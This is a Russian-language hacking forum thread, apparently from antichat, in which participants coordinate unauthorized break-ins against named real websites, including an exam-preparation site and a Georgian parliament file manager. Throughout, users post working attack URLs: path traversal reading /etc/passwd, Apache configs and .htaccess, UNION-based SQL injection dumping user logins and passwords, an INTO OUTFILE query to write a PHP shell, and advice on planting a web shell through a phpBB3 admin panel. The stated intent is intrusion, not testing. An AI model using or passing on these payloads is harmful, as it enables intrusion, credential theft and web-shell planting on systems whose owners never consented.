Ваши вопросы по уязвимостям.

Почему решили что фейк? И лог тоже фейковый?

 

Реально видел, правда один раз, сам админ написал при ../etc/passwd - "это фейк", скорее всего нет прав на чтение

и потом, logs/error_log вовсе не означает, что это тут:

/etc/httpd/logs/error_log

 

Тогда относительно чего же этот путь
logs/error_log

 

все там норм, никакого фейка..логи ищи. Поиск тебе в руки, была тема еttee.

 

Логов по стандартным путям из темы http://forum.antichat.ru/thread49775.html не нашлось

 

Можно ли залить shell сюда?

http://egechita.ru/documents/show_doc.php?doc=68&type=federalsfhjdgj

2 вопрос

/home/www/egechita/documents/show_doc.php

вот структура сайта.

Что я могу ещё полезного вытащить кроме етк/пасс?

сервер *nix

 

Скорпиончик
Вот там еще нашел http://egechita.ru/news/show_news.php?id_news=56+union+select+1,concat_ws(0x3a,login,pass),3,4,5+from+user+limit+1,1/*
пятая ветка

 

я это находил. эти нечего не дают пассы. надо шелл залить

 

попробуй INTO OUTFILE и ищи папку с правами на запись

 

подскадите как составить запрос на запись файла.

 

например:
http://egechita.ru/news/show_news.php?id_news=-1+UNION+SELECT+1,2,3,4,5+INTO+OUTFILE+'/tmp/shell.php'+--+

мб пригодится
http://egechita.ru/documents/show_doc.php?doc=../../../../../../../../etc/httpd/conf/httpd.conf

 

Fuckel

Я вот одного не пойму, зачем советовать то, что не будет работать?
Для записи в файл нужны права, а там их нет у юзера

Скорпиончик Сначала нужно почитать что-то , а потом по прочтению задавать вопросы. Статей куча на форуме

 

я посоветовал ему попробывать, не утверждал что будет работать

 

Можно получить доступ к приватной инфо, кое-что почитать и прочитав нужное сделать таки своё грязное дело

Code:

http://egechita.ru/documents/show_doc.php?doc=68&type=../../../../../home/www/egechita/forum/.htaccess%00

плюс там есть сессии в куках, зарегится везде, где только можно, выкупить путь хранения сессий и посмотреть, что выдаст

там кстати PHPBB3, шелл там льется элементарно, если попасть в админку

ЗЫЖ А можно поискать логи и не париться

 

спс, может ктонить знает какиенить эксплоиты для phpbb3. Подскажите плиз.
какиенибудь ссылки. Уж очень хочиться проникнуть в серв.

 

https://forum.antichat.ru/thread24488.html

 

2 Скорпиончик

http://egechita.ru/documents/show_doc.php?doc=68&type=../../../../../etc/httpd/conf/httpd.conf%00

Конфиг апача. Видим что есть еще два хоста temp.egechita.ru и online.egechita.ru

смотрим online.egechita.ru и видим

http://online.egechita.ru/?theme=-7+union+select+1,2,3,4,5--

SQL injection

Хеш админа форума доступен

 

Какие системные и *несистемные* таблицы есть в PostgreSql ? information_schema там вообще нету

 

http://www.postgresql.org/docs/8.3/static/catalogs.html

 

Гуру, не пойму, можно ли залить шелл с помощью этой формы?
http://www.parliament.ge/adm_includes/editor/file_manager.php

Так же не пойму, то ли форма фильрует рисунки то ли удаляет файл